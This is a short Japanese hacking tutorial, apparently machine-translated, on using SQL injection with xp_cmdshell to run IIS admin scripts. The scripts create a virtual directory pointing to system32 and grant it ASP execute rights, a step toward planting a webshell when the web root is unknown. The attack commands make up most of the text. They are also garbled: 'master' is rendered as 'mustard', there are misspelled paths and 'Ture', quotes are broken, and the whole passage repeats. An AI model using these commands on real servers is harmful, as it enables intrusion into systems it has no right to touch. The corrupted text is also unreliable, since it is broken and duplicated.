SQL注入で仮想ディレクトリを作成し、Web絶対パスを探してください。
私たちはSQL注入でディレクトリと実行コマンドを作成することができますが、ウェブサイトのディレクトリを見つけにくいです。webshellを入手するのは難しいです。
exec マスタード.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScript s\mkwebdir.vbs -c local host -w "l「l」 -v "win","c:\wint\system 32"'
仮想ディレクトリwinを作成して、c:\wint\system 32を指します。
exec マスタード.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScript s\adsutil.vbs w 3 svc/1/root/win/Access execute Ture
win文に解析aspスクリプトの権限を持たせます。
exec マスタード.dbo.xp_cmdshell "cscript C:\Interpub\AdminScript s\adsutil.vbs delete w 3 svc/1/root/h 4 x 0 r/"
仮想ディレクトリを削除します。
ウェブの絶対パスが見つからない解決策の一つです。
http://21o.net/h4x0r
403エラー、仮想ディレクトリが作成されました。
exec マスタード.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScript s\mkwebdir.vbs -c local host -w "l「l」 -v "win","c:\wint\system 32"'
仮想ディレクトリwinを作成して、c:\wint\system 32を指します。
exec マスタード.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScript s\adsutil.vbs w 3 svc/1/root/win/Access execute Ture
win文に解析aspスクリプトの権限を持たせます。
exec マスタード.dbo.xp_cmdshell "cscript C:\Interpub\AdminScript s\adsutil.vbs delete w 3 svc/1/root/h 4 x 0 r/"
仮想ディレクトリを削除します。
ウェブの絶対パスが見つからない解決策の一つです。
http://21o.net/h4x0r
403エラー、仮想ディレクトリが作成されました。